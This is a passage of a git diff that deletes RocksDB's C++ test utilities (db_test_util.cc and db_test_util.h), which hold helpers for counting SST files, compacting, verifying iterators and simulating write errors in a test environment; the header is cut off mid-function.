-      } else {
-        if (!last_options_.comparator->Equal(ikey.user_key, user_key)) {
-          break;
-        }
-        if (!first) {
-          result += ", ";
-        }
-        first = false;
-        switch (ikey.type) {
-          case kTypeValue:
-            result += iter->value().ToString();
-            break;
-          case kTypeMerge:
-            // keep it the same as kTypeValue for testing kMergePut
-            result += iter->value().ToString();
-            break;
-          case kTypeDeletion:
-            result += "DEL";
-            break;
-          case kTypeSingleDeletion:
-            result += "SDEL";
-            break;
-          default:
-            assert(false);
-            break;
-        }
-      }
-      iter->Next();
-    }
-    if (!first) {
-      result += " ";
-    }
-    result += "]";
-  }
-  return result;
-}
-
-#ifndef ROCKSDB_LITE
-int DBTestBase::NumSortedRuns(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  int num_sr = static_cast<int>(cf_meta.levels[0].files.size());
-  for (size_t i = 1U; i < cf_meta.levels.size(); i++) {
-    if (cf_meta.levels[i].files.size() > 0) {
-      num_sr++;
-    }
-  }
-  return num_sr;
-}
-
-uint64_t DBTestBase::TotalSize(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  return cf_meta.size;
-}
-
-uint64_t DBTestBase::SizeAtLevel(int level) {
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  uint64_t sum = 0;
-  for (const auto& m : metadata) {
-    if (m.level == level) {
-      sum += m.size;
-    }
-  }
-  return sum;
-}
-
-size_t DBTestBase::TotalLiveFiles(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  size_t num_files = 0;
-  for (auto& level : cf_meta.levels) {
-    num_files += level.files.size();
-  }
-  return num_files;
-}
-
-size_t DBTestBase::CountLiveFiles() {
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  return metadata.size();
-}
-#endif  // ROCKSDB_LITE
-
-int DBTestBase::NumTableFilesAtLevel(int level, int cf) {
-  std::string property;
-  if (cf == 0) {
-    // default cfd
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-  } else {
-    EXPECT_TRUE(db_->GetProperty(
-        handles_[cf], "rocksdb.num-files-at-level" + NumberToString(level),
-        &property));
-  }
-  return atoi(property.c_str());
-}
-
-double DBTestBase::CompressionRatioAtLevel(int level, int cf) {
-  std::string property;
-  if (cf == 0) {
-    // default cfd
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.compression-ratio-at-level" + NumberToString(level),
-        &property));
-  } else {
-    EXPECT_TRUE(db_->GetProperty(
-        handles_[cf],
-        "rocksdb.compression-ratio-at-level" + NumberToString(level),
-        &property));
-  }
-  return std::stod(property);
-}
-
-int DBTestBase::TotalTableFiles(int cf, int levels) {
-  if (levels == -1) {
-    levels = (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-  }
-  int result = 0;
-  for (int level = 0; level < levels; level++) {
-    result += NumTableFilesAtLevel(level, cf);
-  }
-  return result;
-}
-
-// Return spread of files per level
-std::string DBTestBase::FilesPerLevel(int cf) {
-  int num_levels =
-      (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-  std::string result;
-  size_t last_non_zero_offset = 0;
-  for (int level = 0; level < num_levels; level++) {
-    int f = NumTableFilesAtLevel(level, cf);
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-    result += buf;
-    if (f > 0) {
-      last_non_zero_offset = result.size();
-    }
-  }
-  result.resize(last_non_zero_offset);
-  return result;
-}
-
-size_t DBTestBase::CountFiles() {
-  std::vector<std::string> files;
-  env_->GetChildren(dbname_, &files);
-
-  std::vector<std::string> logfiles;
-  if (dbname_ != last_options_.wal_dir) {
-    env_->GetChildren(last_options_.wal_dir, &logfiles);
-  }
-
-  return files.size() + logfiles.size();
-}
-
-uint64_t DBTestBase::Size(const Slice& start, const Slice& limit, int cf) {
-  Range r(start, limit);
-  uint64_t size;
-  if (cf == 0) {
-    db_->GetApproximateSizes(&r, 1, &size);
-  } else {
-    db_->GetApproximateSizes(handles_[1], &r, 1, &size);
-  }
-  return size;
-}
-
-void DBTestBase::Compact(int cf, const Slice& start, const Slice& limit,
-                         uint32_t target_path_id) {
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = target_path_id;
-  ASSERT_OK(db_->CompactRange(compact_options, handles_[cf], &start, &limit));
-}
-
-void DBTestBase::Compact(int cf, const Slice& start, const Slice& limit) {
-  ASSERT_OK(
-      db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-}
-
-void DBTestBase::Compact(const Slice& start, const Slice& limit) {
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &start, &limit));
-}
-
-// Do n memtable compactions, each of which produces an sstable
-// covering the range [small,large].
-void DBTestBase::MakeTables(int n, const std::string& small,
-                            const std::string& large, int cf) {
-  for (int i = 0; i < n; i++) {
-    ASSERT_OK(Put(cf, small, "begin"));
-    ASSERT_OK(Put(cf, large, "end"));
-    ASSERT_OK(Flush(cf));
-    MoveFilesToLevel(n - i - 1, cf);
-  }
-}
-
-// Prevent pushing of new sstables into deeper levels by adding
-// tables that cover a specified range to all levels.
-void DBTestBase::FillLevels(const std::string& smallest,
-                            const std::string& largest, int cf) {
-  MakeTables(db_->NumberLevels(handles_[cf]), smallest, largest, cf);
-}
-
-void DBTestBase::MoveFilesToLevel(int level, int cf) {
-  for (int l = 0; l < level; ++l) {
-    if (cf > 0) {
-      dbfull()->TEST_CompactRange(l, nullptr, nullptr, handles_[cf]);
-    } else {
-      dbfull()->TEST_CompactRange(l, nullptr, nullptr);
-    }
-  }
-}
-
-void DBTestBase::DumpFileCounts(const char* label) {
-  fprintf(stderr, "---\n%s:\n", label);
-  fprintf(stderr, "maxoverlap: %" PRIu64 "\n",
-          dbfull()->TEST_MaxNextLevelOverlappingBytes());
-  for (int level = 0; level < db_->NumberLevels(); level++) {
-    int num = NumTableFilesAtLevel(level);
-    if (num > 0) {
-      fprintf(stderr, "  level %3d : %d files\n", level, num);
-    }
-  }
-}
-
-std::string DBTestBase::DumpSSTableList() {
-  std::string property;
-  db_->GetProperty("rocksdb.sstables", &property);
-  return property;
-}
-
-void DBTestBase::GetSstFiles(std::string path,
-                             std::vector<std::string>* files) {
-  env_->GetChildren(path, files);
-
-  files->erase(
-      std::remove_if(files->begin(), files->end(), [](std::string name) {
-        uint64_t number;
-        FileType type;
-        return !(ParseFileName(name, &number, &type) && type == kTableFile);
-      }), files->end());
-}
-
-int DBTestBase::GetSstFileCount(std::string path) {
-  std::vector<std::string> files;
-  GetSstFiles(path, &files);
-  return static_cast<int>(files.size());
-}
-
-// this will generate non-overlapping files since it keeps increasing key_idx
-void DBTestBase::GenerateNewFile(int cf, Random* rnd, int* key_idx,
-                                 bool nowait) {
-  for (int i = 0; i < KNumKeysByGenerateNewFile; i++) {
-    ASSERT_OK(Put(cf, Key(*key_idx), RandomString(rnd, (i == 99) ? 1 : 990)));
-    (*key_idx)++;
-  }
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-// this will generate non-overlapping files since it keeps increasing key_idx
-void DBTestBase::GenerateNewFile(Random* rnd, int* key_idx, bool nowait) {
-  for (int i = 0; i < KNumKeysByGenerateNewFile; i++) {
-    ASSERT_OK(Put(Key(*key_idx), RandomString(rnd, (i == 99) ? 1 : 990)));
-    (*key_idx)++;
-  }
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-const int DBTestBase::kNumKeysByGenerateNewRandomFile = 51;
-
-void DBTestBase::GenerateNewRandomFile(Random* rnd, bool nowait) {
-  for (int i = 0; i < kNumKeysByGenerateNewRandomFile; i++) {
-    ASSERT_OK(Put("key" + RandomString(rnd, 7), RandomString(rnd, 2000)));
-  }
-  ASSERT_OK(Put("key" + RandomString(rnd, 7), RandomString(rnd, 200)));
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-std::string DBTestBase::IterStatus(Iterator* iter) {
-  std::string result;
-  if (iter->Valid()) {
-    result = iter->key().ToString() + "->" + iter->value().ToString();
-  } else {
-    result = "(invalid)";
-  }
-  return result;
-}
-
-Options DBTestBase::OptionsForLogIterTest() {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.WAL_ttl_seconds = 1000;
-  return options;
-}
-
-std::string DBTestBase::DummyString(size_t len, char c) {
-  return std::string(len, c);
-}
-
-void DBTestBase::VerifyIterLast(std::string expected_key, int cf) {
-  Iterator* iter;
-  ReadOptions ro;
-  if (cf == 0) {
-    iter = db_->NewIterator(ro);
-  } else {
-    iter = db_->NewIterator(ro, handles_[cf]);
-  }
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), expected_key);
-  delete iter;
-}
-
-// Used to test InplaceUpdate
-
-// If previous value is nullptr or delta is > than previous value,
-//   sets newValue with delta
-// If previous value is not empty,
-//   updates previous value with 'b' string of previous value size - 1.
-UpdateStatus DBTestBase::updateInPlaceSmallerSize(char* prevValue,
-                                                  uint32_t* prevSize,
-                                                  Slice delta,
-                                                  std::string* newValue) {
-  if (prevValue == nullptr) {
-    *newValue = std::string(delta.size(), 'c');
-    return UpdateStatus::UPDATED;
-  } else {
-    *prevSize = *prevSize - 1;
-    std::string str_b = std::string(*prevSize, 'b');
-    memcpy(prevValue, str_b.c_str(), str_b.size());
-    return UpdateStatus::UPDATED_INPLACE;
-  }
-}
-
-UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue,
-                                                        uint32_t* prevSize,
-                                                        Slice delta,
-                                                        std::string* newValue) {
-  if (prevValue == nullptr) {
-    *newValue = std::string(delta.size(), 'c');
-    return UpdateStatus::UPDATED;
-  } else {
-    *prevSize = 1;
-    std::string str_b = std::string(*prevSize, 'b');
-    memcpy(prevValue, str_b.c_str(), str_b.size());
-    return UpdateStatus::UPDATED_INPLACE;
-  }
-}
-
-UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue,
-                                                 uint32_t* prevSize,
-                                                 Slice delta,
-                                                 std::string* newValue) {
-  *newValue = std::string(delta.size(), 'c');
-  return UpdateStatus::UPDATED;
-}
-
-UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue,
-                                               uint32_t* prevSize, Slice delta,
-                                               std::string* newValue) {
-  return UpdateStatus::UPDATE_FAILED;
-}
-
-// Utility method to test InplaceUpdate
-void DBTestBase::validateNumberOfEntries(int numValues, int cf) {
-  ScopedArenaIterator iter;
-  Arena arena;
-  auto options = CurrentOptions();
-  InternalKeyComparator icmp(options.comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  if (cf != 0) {
-    iter.set(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[cf]));
-  } else {
-    iter.set(dbfull()->NewInternalIterator(&arena, &range_del_agg));
-  }
-  iter->SeekToFirst();
-  ASSERT_EQ(iter->status().ok(), true);
-  int seq = numValues;
-  while (iter->Valid()) {
-    ParsedInternalKey ikey;
-    ikey.sequence = -1;
-    ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-
-    // checks sequence number for updates
-    ASSERT_EQ(ikey.sequence, (unsigned)seq--);
-    iter->Next();
-  }
-  ASSERT_EQ(0, seq);
-}
-
-void DBTestBase::CopyFile(const std::string& source,
-                          const std::string& destination, uint64_t size) {
-  const EnvOptions soptions;
-  unique_ptr<SequentialFile> srcfile;
-  ASSERT_OK(env_->NewSequentialFile(source, &srcfile, soptions));
-  unique_ptr<WritableFile> destfile;
-  ASSERT_OK(env_->NewWritableFile(destination, &destfile, soptions));
-
-  if (size == 0) {
-    // default argument means copy everything
-    ASSERT_OK(env_->GetFileSize(source, &size));
-  }
-
-  char buffer[4096];
-  Slice slice;
-  while (size > 0) {
-    uint64_t one = std::min(uint64_t(sizeof(buffer)), size);
-    ASSERT_OK(srcfile->Read(one, &slice, buffer));
-    ASSERT_OK(destfile->Append(slice));
-    size -= slice.size();
-  }
-  ASSERT_OK(destfile->Close());
-}
-
-std::unordered_map<std::string, uint64_t> DBTestBase::GetAllSSTFiles(
-    uint64_t* total_size) {
-  std::unordered_map<std::string, uint64_t> res;
-
-  if (total_size) {
-    *total_size = 0;
-  }
-  std::vector<std::string> files;
-  env_->GetChildren(dbname_, &files);
-  for (auto& file_name : files) {
-    uint64_t number;
-    FileType type;
-    std::string file_path = dbname_ + "/" + file_name;
-    if (ParseFileName(file_name, &number, &type) && type == kTableFile) {
-      uint64_t file_size = 0;
-      env_->GetFileSize(file_path, &file_size);
-      res[file_path] = file_size;
-      if (total_size) {
-        *total_size += file_size;
-      }
-    }
-  }
-  return res;
-}
-
-std::vector<std::uint64_t> DBTestBase::ListTableFiles(Env* env,
-                                                      const std::string& path) {
-  std::vector<std::string> files;
-  std::vector<uint64_t> file_numbers;
-  env->GetChildren(path, &files);
-  uint64_t number;
-  FileType type;
-  for (size_t i = 0; i < files.size(); ++i) {
-    if (ParseFileName(files[i], &number, &type)) {
-      if (type == kTableFile) {
-        file_numbers.push_back(number);
-      }
-    }
-  }
-  return file_numbers;
-}
-
-void DBTestBase::VerifyDBFromMap(std::map<std::string, std::string> true_data,
-                                 size_t* total_reads_res, bool tailing_iter,
-                                 std::map<std::string, Status> status) {
-  size_t total_reads = 0;
-
-  for (auto& kv : true_data) {
-    Status s = status[kv.first];
-    if (s.ok()) {
-      ASSERT_EQ(Get(kv.first), kv.second);
-    } else {
-      std::string value;
-      ASSERT_EQ(s, db_->Get(ReadOptions(), kv.first, &value));
-    }
-    total_reads++;
-  }
-
-  // Normal Iterator
-  {
-    int iter_cnt = 0;
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    Iterator* iter = db_->NewIterator(ro);
-    // Verify Iterator::Next()
-    iter_cnt = 0;
-    auto data_iter = true_data.begin();
-    Status s;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next(), data_iter++) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      Status current_status = status[data_iter->first];
-      if (!current_status.ok()) {
-        s = current_status;
-      }
-      ASSERT_EQ(iter->status(), s);
-      if (current_status.ok()) {
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      }
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_iter, true_data.end()) << iter_cnt << " / "
-                                          << true_data.size();
-    delete iter;
-
-    // Verify Iterator::Prev()
-    // Use a new iterator to make sure its status is clean.
-    iter = db_->NewIterator(ro);
-    iter_cnt = 0;
-    s = Status::OK();
-    auto data_rev = true_data.rbegin();
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev(), data_rev++) {
-      ASSERT_EQ(iter->key().ToString(), data_rev->first);
-      Status current_status = status[data_rev->first];
-      if (!current_status.ok()) {
-        s = current_status;
-      }
-      ASSERT_EQ(iter->status(), s);
-      if (current_status.ok()) {
-        ASSERT_EQ(iter->value().ToString(), data_rev->second);
-      }
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_rev, true_data.rend()) << iter_cnt << " / "
-                                          << true_data.size();
-
-    // Verify Iterator::Seek()
-    for (auto kv : true_data) {
-      iter->Seek(kv.first);
-      ASSERT_EQ(kv.first, iter->key().ToString());
-      ASSERT_EQ(kv.second, iter->value().ToString());
-      total_reads++;
-    }
-    delete iter;
-  }
-
-  if (tailing_iter) {
-#ifndef ROCKSDB_LITE
-    // Tailing iterator
-    int iter_cnt = 0;
-    ReadOptions ro;
-    ro.tailing = true;
-    ro.total_order_seek = true;
-    Iterator* iter = db_->NewIterator(ro);
-
-    // Verify ForwardIterator::Next()
-    iter_cnt = 0;
-    auto data_iter = true_data.begin();
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next(), data_iter++) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_iter, true_data.end()) << iter_cnt << " / "
-                                          << true_data.size();
-
-    // Verify ForwardIterator::Seek()
-    for (auto kv : true_data) {
-      iter->Seek(kv.first);
-      ASSERT_EQ(kv.first, iter->key().ToString());
-      ASSERT_EQ(kv.second, iter->value().ToString());
-      total_reads++;
-    }
-
-    delete iter;
-#endif  // ROCKSDB_LITE
-  }
-
-  if (total_reads_res) {
-    *total_reads_res = total_reads;
-  }
-}
-
-void DBTestBase::VerifyDBInternal(
-    std::vector<std::pair<std::string, std::string>> true_data) {
-  Arena arena;
-  InternalKeyComparator icmp(last_options_.comparator);
-  RangeDelAggregator range_del_agg(icmp, {});
-  auto iter = dbfull()->NewInternalIterator(&arena, &range_del_agg);
-  iter->SeekToFirst();
-  for (auto p : true_data) {
-    ASSERT_TRUE(iter->Valid());
-    ParsedInternalKey ikey;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &ikey));
-    ASSERT_EQ(p.first, ikey.user_key);
-    ASSERT_EQ(p.second, iter->value());
-    iter->Next();
-  };
-  ASSERT_FALSE(iter->Valid());
-  iter->~InternalIterator();
-}
-
-#ifndef ROCKSDB_LITE
-
-uint64_t DBTestBase::GetNumberOfSstFilesForColumnFamily(
-    DB* db, std::string column_family_name) {
-  std::vector<LiveFileMetaData> metadata;
-  db->GetLiveFilesMetaData(&metadata);
-  uint64_t result = 0;
-  for (auto& fileMetadata : metadata) {
-    result += (fileMetadata.column_family_name == column_family_name);
-  }
-  return result;
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_test_util.h b/thirdparty/rocksdb/db/db_test_util.h
deleted file mode 100644
index f2caa46..0000000
--- a/thirdparty/rocksdb/db/db_test_util.h
+++ /dev/null
@@ -1,970 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <fcntl.h>
-#include <inttypes.h>
-
-#include <algorithm>
-#include <map>
-#include <set>
-#include <string>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-namespace anon {
-class AtomicCounter {
- public:
-  explicit AtomicCounter(Env* env = NULL)
-      : env_(env), cond_count_(&mu_), count_(0) {}
-
-  void Increment() {
-    MutexLock l(&mu_);
-    count_++;
-    cond_count_.SignalAll();
-  }
-
-  int Read() {
-    MutexLock l(&mu_);
-    return count_;
-  }
-
-  bool WaitFor(int count) {
-    MutexLock l(&mu_);
-
-    uint64_t start = env_->NowMicros();
-    while (count_ < count) {
-      uint64_t now = env_->NowMicros();
-      cond_count_.TimedWait(now + /*1s*/ 1 * 1000 * 1000);
-      if (env_->NowMicros() - start > /*10s*/ 10 * 1000 * 1000) {
-        return false;
-      }
-      if (count_ < count) {
-        GTEST_LOG_(WARNING) << "WaitFor is taking more time than usual";
-      }
-    }
-
-    return true;
-  }
-
-  void Reset() {
-    MutexLock l(&mu_);
-    count_ = 0;
-    cond_count_.SignalAll();
-  }
-
- private:
-  Env* env_;
-  port::Mutex mu_;
-  port::CondVar cond_count_;
-  int count_;
-};
-
-struct OptionsOverride {
-  std::shared_ptr<const FilterPolicy> filter_policy = nullptr;
-  // These will be used only if filter_policy is set
-  bool partition_filters = false;
-  uint64_t metadata_block_size = 1024;
-  BlockBasedTableOptions::IndexType index_type =
-      BlockBasedTableOptions::IndexType::kBinarySearch;
-
-  // Used as a bit mask of individual enums in which to skip an XF test point
-  int skip_policy = 0;
-};
-
-}  // namespace anon
-
-enum SkipPolicy { kSkipNone = 0, kSkipNoSnapshot = 1, kSkipNoPrefix = 2 };
-
-// A hacky skip list mem table that triggers flush after number of entries.
-class SpecialMemTableRep : public MemTableRep {
- public:
-  explicit SpecialMemTableRep(Allocator* allocator, MemTableRep* memtable,
-                              int num_entries_flush)
-      : MemTableRep(allocator),
-        memtable_(memtable),
-        num_entries_flush_(num_entries_flush),
-        num_entries_(0) {}
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override {
-    return memtable_->Allocate(len, buf);
-  }
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  virtual void Insert(KeyHandle handle) override {
-    memtable_->Insert(handle);
-    num_entries_++;
-  }
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  virtual bool Contains(const char* key) const override {
-    return memtable_->Contains(key);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    // Return a high memory usage when number of entries exceeds the threshold
-    // to trigger a flush.
-    return (num_entries_ < num_entries_flush_) ? 0 : 1024 * 1024 * 1024;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    memtable_->Get(k, callback_args, callback_func);
-  }
-
-  uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                 const Slice& end_ikey) override {
-    return memtable_->ApproximateNumEntries(start_ikey, end_ikey);
-  }
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override {
-    return memtable_->GetIterator(arena);
-  }
-
-  virtual ~SpecialMemTableRep() override {}
-
- private:
-  unique_ptr<MemTableRep> memtable_;
-  int num_entries_flush_;
-  int num_entries_;
-};
-
-// The factory for the hacky skip list mem table that triggers flush after
-// number of entries exceeds a threshold.
-class SpecialSkipListFactory : public MemTableRepFactory {
- public:
-  // After number of inserts exceeds `num_entries_flush` in a mem table, trigger
-  // flush.
-  explicit SpecialSkipListFactory(int num_entries_flush)
-      : num_entries_flush_(num_entries_flush) {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override {
-    return new SpecialMemTableRep(
-        allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0),
-        num_entries_flush_);
-  }
-  virtual const char* Name() const override { return "SkipListFactory"; }
-
-  bool IsInsertConcurrentlySupported() const override {
-    return factory_.IsInsertConcurrentlySupported();
-  }
-
- private:
-  SkipListFactory factory_;
-  int num_entries_flush_;
-};
-
-// Special Env used to delay background operations
-class SpecialEnv : public EnvWrapper {
- public:
-  explicit SpecialEnv(Env* base);
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    class SSTableFile : public WritableFile {
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-
-     public:
-      SSTableFile(SpecialEnv* env, unique_ptr<WritableFile>&& base)
-          : env_(env), base_(std::move(base)) {}
-      Status Append(const Slice& data) override {
-        if (env_->table_write_callback_) {
-          (*env_->table_write_callback_)();
-        }
-        if (env_->drop_writes_.load(std::memory_order_acquire)) {
-          // Drop writes on the floor
-          return Status::OK();
-        } else if (env_->no_space_.load(std::memory_order_acquire)) {
-          return Status::NoSpace("No space left on device");
-        } else {
-          env_->bytes_written_ += data.size();
-          return base_->Append(data);
-        }
-      }
-      Status PositionedAppend(const Slice& data, uint64_t offset) override {
-        if (env_->table_write_callback_) {
-          (*env_->table_write_callback_)();
-        }
-        if (env_->drop_writes_.load(std::memory_order_acquire)) {
-          // Drop writes on the floor
-          return Status::OK();
-        } else if (env_->no_space_.load(std::memory_order_acquire)) {
-          return Status::NoSpace("No space left on device");
-        } else {
-          env_->bytes_written_ += data.size();
-          return base_->PositionedAppend(data, offset);
-        }
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-        Status s = base_->RangeSync(offset, nbytes);
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::RangeSync", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      Status Close() override {
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        // Check preallocation size
-        // preallocation size is never passed to base file.
-        size_t preallocation_size = preallocation_block_size();
-        TEST_SYNC_POINT_CALLBACK("DBTestWritableFile.GetPreallocationStatus",
-                                 &preallocation_size);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        Status s = base_->Close();
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::Close", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        while (env_->delay_sstable_sync_.load(std::memory_order_acquire)) {
-          env_->SleepForMicroseconds(100000);
-        }
-        Status s = base_->Sync();
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::Sync", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      void SetIOPriority(Env::IOPriority pri) override {
-        base_->SetIOPriority(pri);
-      }
-      Env::IOPriority GetIOPriority() override {
-        return base_->GetIOPriority();
-      }
-      bool use_direct_io() const override {
-        return base_->use_direct_io();
-      }
-      Status Allocate(uint64_t offset, uint64_t len) override {
-        return base_->Allocate(offset, len);
-      }
-    };
-    class ManifestFile : public WritableFile {
-     public:
-      ManifestFile(SpecialEnv* env, unique_ptr<WritableFile>&& b)
-          : env_(env), base_(std::move(b)) {}
-      Status Append(const Slice& data) override {
-        if (env_->manifest_write_error_.load(std::memory_order_acquire)) {
-          return Status::IOError("simulated writer error");
-        } else {
-          return base_->Append(data);
-        }
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status Close() override { return base_->Close(); }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        if (env_->manifest_sync_error_.load(std::memory_order_acquire)) {
-          return Status::IOError("simulated sync error");
-        } else {
-          return base_->Sync();
-        }
-      }
-      uint64_t GetFileSize() override { return base_->GetFileSize(); }
-
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-    };
-    class WalFile : public WritableFile {
-     public:
-      WalFile(SpecialEnv* env, unique_ptr<WritableFile>&& b)
-          : env_(env), base_(std::move(b)) {
-        env_->num_open_wal_file_.fetch_add(1);
-      }
-      virtual ~WalFile() { env_->num_open_wal_file_.fetch_add(-1); }
-      Status Append(const Slice& data) override {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT("SpecialEnv::WalFile::Append:1");
-#endif
-        Status s;
-        if (env_->log_write_error_.load(std::memory_order_acquire)) {
-          s = Status::IOError("simulated writer error");
-        } else {
-          int slowdown =
-              env_->log_write_slowdown_.load(std::memory_order_acquire);
-          if (slowdown > 0) {
-            env_->SleepForMicroseconds(slowdown);
-          }
-          s = base_->Append(data);
-        }
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT("SpecialEnv::WalFile::Append:2");
-#endif
-        return s;
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status Close() override {
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        // Check preallocation size
-        // preallocation size is never passed to base file.
-        size_t preallocation_size = preallocation_block_size();
-        TEST_SYNC_POINT_CALLBACK("DBTestWalFile.GetPreallocationStatus",
-                                 &preallocation_size);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-
-        return base_->Close();
-      }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        return base_->Sync();
-      }
-      bool IsSyncThreadSafe() const override {
-        return env_->is_wal_sync_thread_safe_.load();
-      }
-
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-    };
-
-    if (non_writeable_rate_.load(std::memory_order_acquire) > 0) {
-      uint32_t random_number;
-      {
-        MutexLock l(&rnd_mutex_);
